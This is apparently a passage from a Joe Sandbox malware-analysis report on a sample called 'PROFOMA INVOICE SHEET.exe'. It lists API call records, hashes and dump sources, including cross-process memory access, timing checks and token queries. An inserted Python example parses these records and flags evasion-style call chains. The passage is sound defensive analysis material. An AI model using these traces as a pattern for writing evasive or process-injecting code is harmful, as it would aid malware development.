                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00319693
                                    • SelectObject.GDI32(?,00000000), ref: 003196A2
                                    • BeginPath.GDI32(?), ref: 003196B9
                                    • SelectObject.GDI32(?,00000000), ref: 003196E2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$BeginCreatePath
                                    • String ID:
                                    • API String ID: 3225163088-0
                                    • Opcode ID: 1471ecf3aa44b84058cd1fb1303c77fe2cfaf436dbaa0ba2bf7327df305ea191
                                    • Instruction ID: 7b2df3f6d357ddd24d96a4b7f424592213908bd9849e6df1351305b64c6978ff
                                    • Opcode Fuzzy Hash: 1471ecf3aa44b84058cd1fb1303c77fe2cfaf436dbaa0ba2bf7327df305ea191
                                    • Instruction Fuzzy Hash: EF215771812305EBDB139F64EC28BE93BACBB04366F110217F810A61B1D3719895CBE4
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _memcmp
                                    • String ID:
                                    • API String ID: 2931989736-0
                                    • Opcode ID: fbc3317ed3754e9e2eaaacc5a112688ea04d2921a6f359147e2f9a6060100a45
                                    • Instruction ID: a60bf42dbf4ae4a022be5098cae3a616e690a9bccc2da421b597fca030fff330
                                    • Opcode Fuzzy Hash: fbc3317ed3754e9e2eaaacc5a112688ea04d2921a6f359147e2f9a6060100a45
                                    • Instruction Fuzzy Hash: B101B575641A19BFD70B9510AE82FFB735D9B313A4F008030FE04AE645F761ED2086E0
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,0032F2DE,00333863,003D1444,?,0031FDF5,?,?,0030A976,00000010,003D1440,003013FC,?,003013C6), ref: 00332DFD
                                    • _free.LIBCMT ref: 00332E32
                                    • _free.LIBCMT ref: 00332E59
                                    • SetLastError.KERNEL32(00000000,00301129), ref: 00332E66
                                    • SetLastError.KERNEL32(00000000,00301129), ref: 00332E6F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_free
                                    • String ID:
                                    • API String ID: 3170660625-0
                                    • Opcode ID: 472445ffec5152a25522e738b32820bdeea81553fea042362dde50902e18c655
                                    • Instruction ID: 153cdca951f4c9d3a91981c7a41d76d473ae12ee17e8af0fcb2e7936800b7014
                                    • Opcode Fuzzy Hash: 472445ffec5152a25522e738b32820bdeea81553fea042362dde50902e18c655
                                    • Instruction Fuzzy Hash: CE014C362456007BC6132779BCC7E2B265DAFC13B1F265429F425E62D2EF75CC015120
                                    APIs
                                    • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?,?,?,0036035E), ref: 0036002B
                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?,?), ref: 00360046
                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?,?), ref: 00360054
                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?), ref: 00360064
                                    • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0035FF41,80070057,?,?), ref: 00360070
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                    • String ID:
                                    • API String ID: 3897988419-0
                                    • Opcode ID: c4a8799b54389c71c619124fc58d20af107cee1460e7bff67f18b2adc4f85ca2
                                    • Instruction ID: a479f9844bddb7f53c7679b43a4abf380ab8c41936494fccaf0dddd297717868
                                    • Opcode Fuzzy Hash: c4a8799b54389c71c619124fc58d20af107cee1460e7bff67f18b2adc4f85ca2
                                    • Instruction Fuzzy Hash: 9901F972620204BFDB124F68DC09BAF7AEDEF48392F108025F805D2214EBB2CD008BA0
                                    APIs
                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0036E997
                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 0036E9A5
                                    • Sleep.KERNEL32(00000000), ref: 0036E9AD
                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0036E9B7
                                    • Sleep.KERNEL32 ref: 0036E9F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                    • String ID:
                                    • API String ID: 2833360925-0
                                    • Opcode ID: e9c0ee2402e7061f32de649c5471daeac237b1cf8a4319429f85a1733ab97d31
                                    • Instruction ID: b81f3648a58d5b461cb01ae60e84547b8714976bb87f63f22dfc48c13e4da424
                                    • Opcode Fuzzy Hash: e9c0ee2402e7061f32de649c5471daeac237b1cf8a4319429f85a1733ab97d31
                                    • Instruction Fuzzy Hash: BB015735C1162DDBCF02AFE4D859AEEBBB8BF08700F014546E502B2248CB389558CBA5
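Added example (editor's code, not part of the Joe Sandbox report and not a Joe Sandbox rule set): a small parser for the "• Api.DLL(args), ref: addr" records in this report, with three illustrative API-chain heuristics that match what the report's signatures describe (a QueryPerformanceCounter/Sleep/QueryPerformanceCounter timing measurement, a GetCursorPos plus GetAsyncKeyState user-input probe, and a GetTokenInformation query with class 2, which is TokenGroups). The sample input is constructed from three of the records above, abridged; the heuristic names and thresholds are the editor's assumptions and only flag the chain, they do not prove intent (in an AutoIt-compiled binary such chains are frequently runtime helpers).

```python
import re

# Constructed sample: three records copied in abridged form from this report,
# in the same "• Name.DLL(args), ref: addr" layout the report uses.
SAMPLE_REPORT = """\
APIs
• GetCursorPos.USER32(?), ref: 00319141
• ScreenToClient.USER32(00000000,?), ref: 0031915E
• GetAsyncKeyState.USER32(00000001), ref: 00319183
• GetAsyncKeyState.USER32(00000002), ref: 0031919D
Memory Dump Source
APIs
• QueryPerformanceCounter.KERNEL32(?), ref: 0036E997
• QueryPerformanceFrequency.KERNEL32(?), ref: 0036E9A5
• Sleep.KERNEL32(00000000), ref: 0036E9AD
• QueryPerformanceCounter.KERNEL32(?), ref: 0036E9B7
• Sleep.KERNEL32 ref: 0036E9F3
Memory Dump Source
APIs
• GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00360FCA
• GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00360FD6
Memory Dump Source
"""

# One API line; the optional "Part of subcall function XXXX:" prefix and the
# parenthesis-free form ("Sleep.KERNEL32 ref: ...") both appear in the report.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(\w+)\.(\w+)(?:\((.*?)\))?,?\s*ref:\s*([0-9A-Fa-f]+)"
)


def parse_records(text):
    """Split report text into function records: each 'APIs' header starts a
    record, which runs until the 'Memory Dump Source' header."""
    records, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = []
            records.append(current)
        elif stripped == "Memory Dump Source":
            current = None
        elif current is not None:
            m = API_LINE.match(line)
            if m:
                name, dll, args, ref = m.groups()
                current.append({
                    "api": name,
                    "dll": dll,
                    "args": [a for a in (args or "").split(",") if a],
                    "ref": int(ref, 16),
                })
    return records


def tag_record(apis):
    """Illustrative chain heuristics (assumption: editor's own, not the sandbox's)."""
    names = [a["api"] for a in apis]
    tags = []
    # Two QPC reads around a Sleep: elapsed-time measurement, the pattern the
    # 'execution timing' signature refers to.
    if names.count("QueryPerformanceCounter") >= 2 and "Sleep" in names:
        tags.append("timing-check")
    # Cursor position plus async button state: probes for a live user.
    if "GetCursorPos" in names and "GetAsyncKeyState" in names:
        tags.append("user-input-probe")
    # GetTokenInformation with TokenInformationClass == 2 (TokenGroups).
    for a in apis:
        if a["api"] == "GetTokenInformation" and len(a["args"]) > 1 \
                and a["args"][1] == "00000002":
            tags.append("token-groups-query")
            break
    return tags


def scan(text):
    """Return (first call address, tags) for every non-empty record."""
    return [(f"{rec[0]['ref']:08X}", tag_record(rec))
            for rec in parse_records(text) if rec]


if __name__ == "__main__":
    for addr, tags in scan(SAMPLE_REPORT):
        print(addr, ", ".join(tags) or "-")
```

Run it against a saved copy of the report's function section to get one line per record with its first call address; records with no tag print a dash. Empty "APIs" records (several appear above) are skipped rather than reported.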
                                    APIs
                                    • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00361114
                                    • GetLastError.KERNEL32(?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 00361120
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 0036112F
                                    • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00360B9B,?,?,?), ref: 00361136
                                    • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0036114D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                     • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                    • String ID:
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00360FCA
                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00360FD6
                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00360FE5
                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00360FEC
                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00361002
                                    Similarity
                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                    • String ID:
                                    APIs
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0036102A
                                    • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00361036
                                    • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00361045
                                    • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0036104C
                                    • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00361062
                                    Similarity
                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                    • String ID:
                                    APIs
                                    • CloseHandle.KERNEL32(?,?,?,?,0037017D,?,003732FC,?,00000001,00342592,?), ref: 00370324
                                    • CloseHandle.KERNEL32(?,?,?,?,0037017D,?,003732FC,?,00000001,00342592,?), ref: 00370331
                                    • CloseHandle.KERNEL32(?,?,?,?,0037017D,?,003732FC,?,00000001,00342592,?), ref: 0037033E
                                    • CloseHandle.KERNEL32(?,?,?,?,0037017D,?,003732FC,?,00000001,00342592,?), ref: 0037034B
                                    • CloseHandle.KERNEL32(?,?,?,?,0037017D,?,003732FC,?,00000001,00342592,?), ref: 00370358
                                    • CloseHandle.KERNEL32(?,?,?,?,0037017D,?,003732FC,?,00000001,00342592,?), ref: 00370365
                                    Similarity
                                    • API ID: CloseHandle
                                    • String ID:
                                    APIs
                                    • _free.LIBCMT ref: 0033D752
                                      • Part of subcall function 003329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000), ref: 003329DE
                                      • Part of subcall function 003329C8: GetLastError.KERNEL32(00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000,00000000), ref: 003329F0
                                    • _free.LIBCMT ref: 0033D764
                                    • _free.LIBCMT ref: 0033D776
                                    • _free.LIBCMT ref: 0033D788
                                    • _free.LIBCMT ref: 0033D79A
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    APIs
                                    • GetDlgItem.USER32(?,000003E9), ref: 00365C58
                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00365C6F
                                    • MessageBeep.USER32(00000000), ref: 00365C87
                                    • KillTimer.USER32(?,0000040A), ref: 00365CA3
                                    • EndDialog.USER32(?,00000001), ref: 00365CBD
                                    Similarity
                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                    • String ID:
                                    APIs
                                    • _free.LIBCMT ref: 003322BE
                                      • Part of subcall function 003329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000), ref: 003329DE
                                      • Part of subcall function 003329C8: GetLastError.KERNEL32(00000000,?,0033D7D1,00000000,00000000,00000000,00000000,?,0033D7F8,00000000,00000007,00000000,?,0033DBF5,00000000,00000000), ref: 003329F0
                                    • _free.LIBCMT ref: 003322D0
                                    • _free.LIBCMT ref: 003322E3
                                    • _free.LIBCMT ref: 003322F4
                                    • _free.LIBCMT ref: 00332305
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    APIs
                                    • EndPath.GDI32(?), ref: 003195D4
                                    • StrokeAndFillPath.GDI32(?,?,003571F7,00000000,?,?,?), ref: 003195F0
                                    • SelectObject.GDI32(?,00000000), ref: 00319603
                                    • DeleteObject.GDI32 ref: 00319616
                                    • StrokePath.GDI32(?), ref: 00319631
                                    Similarity
                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                    • String ID:
                                    Similarity
                                    • API ID: __freea$_free
                                    • String ID: a/p$am/pm
                                    APIs
                                      • Part of subcall function 00320242: EnterCriticalSection.KERNEL32(003D070C,003D1884,?,?,0031198B,003D2518,?,?,?,003012F9,00000000), ref: 0032024D
                                      • Part of subcall function 00320242: LeaveCriticalSection.KERNEL32(003D070C,?,0031198B,003D2518,?,?,?,003012F9,00000000), ref: 0032028A
                                      • Part of subcall function 003200A3: __onexit.LIBCMT ref: 003200A9
                                    • __Init_thread_footer.LIBCMT ref: 00386238
                                      • Part of subcall function 003201F8: EnterCriticalSection.KERNEL32(003D070C,?,?,00318747,003D2514), ref: 00320202
                                      • Part of subcall function 003201F8: LeaveCriticalSection.KERNEL32(003D070C,?,00318747,003D2514), ref: 00320235
                                      • Part of subcall function 0037359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003735E4
                                      • Part of subcall function 0037359C: LoadStringW.USER32(003D2390,?,00000FFF,?), ref: 0037360A
                                    Similarity
                                    • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                    • String ID: x#=$x#=$x#=
                                    Similarity
                                    • API ID:
                                    • String ID: JO0
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00338B6E
                                    • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00338B7A
                                    • __dosmaperr.LIBCMT ref: 00338B81
                                    Similarity
                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                    • String ID: .2
                                    APIs
                                      • Part of subcall function 0036B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003621D0,?,?,00000034,00000800,?,00000034), ref: 0036B42D
                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00362760
                                      • Part of subcall function 0036B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003621FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0036B3F8
                                      • Part of subcall function 0036B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0036B355
                                      • Part of subcall function 0036B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00362194,00000034,?,?,00001004,00000000,00000000), ref: 0036B365
                                      • Part of subcall function 0036B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00362194,00000034,?,?,00001004,00000000,00000000), ref: 0036B37B
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003627CD
                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0036281A
                                    Similarity
                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                    • String ID: @
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe,00000104), ref: 00331769
                                    • _free.LIBCMT ref: 00331834
                                    • _free.LIBCMT ref: 0033183E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: _free$FileModuleName
                                    • String ID: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe
                                    • API String ID: 2506810119-4243878502
                                    • Opcode ID: f01920e7648d9f10e287c09f781411a32fab729c1d65f3e157079ae80efbb250
                                    • Instruction ID: 5480d01c69211d7b96293aca87a71a0a44f7e9cd1cee025674b556d2f45f381d
                                    • Opcode Fuzzy Hash: f01920e7648d9f10e287c09f781411a32fab729c1d65f3e157079ae80efbb250
                                    • Instruction Fuzzy Hash: 32314C75A00218BFDB23DB99ACC5D9EBBBCEB85310F1541A6E8049B211D6718A40CBA4
                                    APIs
                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0036C306
                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 0036C34C
                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,003D1990,01255F90), ref: 0036C395
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Menu$Delete$InfoItem
                                    • String ID: 0
                                    • API String ID: 135850232-4108050209
                                    • Opcode ID: fc8961b8211180cf2418b5e0e54ab7e38df6d4f3b38069ce69298e62b346b5f7
                                    • Instruction ID: 6fcc0a97d7374aa250171526d5716d10a7e97715aa8d88c0ce829109005d9f51
                                    • Opcode Fuzzy Hash: fc8961b8211180cf2418b5e0e54ab7e38df6d4f3b38069ce69298e62b346b5f7
                                    • Instruction Fuzzy Hash: 4B41D2352143019FD722DF25D844B2ABBE8AF85310F21DA1EF9A59B3D5C734E804CB62
                                    APIs
                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0039CC08,00000000,?,?,?,?), ref: 003944AA
                                    • GetWindowLongW.USER32 ref: 003944C7
                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003944D7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Window$Long
                                    • String ID: SysTreeView32
                                    • API String ID: 847901565-1698111956
                                    • Opcode ID: 1c1037035ae0dfd92d77700c57ac97a8a6b0339260972cb1c3a91677126b2acf
                                    • Instruction ID: e6b2584fdc29152697bbf124d0f68c8dbbb34065cc2ebccc9ad7fa7783adf459
                                    • Opcode Fuzzy Hash: 1c1037035ae0dfd92d77700c57ac97a8a6b0339260972cb1c3a91677126b2acf
                                    • Instruction Fuzzy Hash: 8931CD32210205AFDF228E78DC45FEA7BA9EB09334F224315F979921D0D770EC519B50
                                    APIs
                                    • SysReAllocString.OLEAUT32(?,?), ref: 00366EED
                                    • VariantCopyInd.OLEAUT32(?,?), ref: 00366F08
                                    • VariantClear.OLEAUT32(?), ref: 00366F12
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: Variant$AllocClearCopyString
                                    • String ID: *j6
                                    • API String ID: 2173805711-2587036816
                                    • Opcode ID: b64e63dbd9dc9811d0df97d7116f084ce9dcbae8f376bce75d0c5bf57e746566
                                    • Instruction ID: 21741d73ffa72be9554e106d5f3f44ac4496078d5a600d299dc31a27b41ae766
                                    • Opcode Fuzzy Hash: b64e63dbd9dc9811d0df97d7116f084ce9dcbae8f376bce75d0c5bf57e746566
                                    • Instruction Fuzzy Hash: 58319171605245DFCB07AFA4E8A29BE777AEF85344B10449DF9024F2A1CB359D22DB90
                                    APIs
                                      • Part of subcall function 0038335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00383077,?,?), ref: 00383378
                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0038307A
                                    • _wcslen.LIBCMT ref: 0038309B
                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00383106
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705550037.00000000003D4000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_300000_PROFOMA INVOICE SHEET.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                    • String ID: 255.255.255.255
                                    • API String ID: 946324512-2422070025
                                    • Opcode ID: e3b7f9d5945b119249ebe4870e5351de2bf227992d6de314be4fd57c9aa4e64c
                                    • Instruction ID: da06d398cdf94b17a1496a0e7efccb9a5f285054c26f6d7ad7090aebdd82c56a
                                    • Opcode Fuzzy Hash: e3b7f9d5945b119249ebe4870e5351de2bf227992d6de314be4fd57c9aa4e64c
                                    • Instruction Fuzzy Hash: 2131F379604301DFCB12EF28C485EAA77E0EF14B18F258099E8168F792CB72EE41C760
                                    APIs
                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00394705
                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00394713
                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0039471A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1705164799.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 00000000.00000002.1705147808.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.000000000039C000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705453995.00000000003C2000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1705533012.00000000003CC000.00000004.00000001.01000000.00000003.sdmp
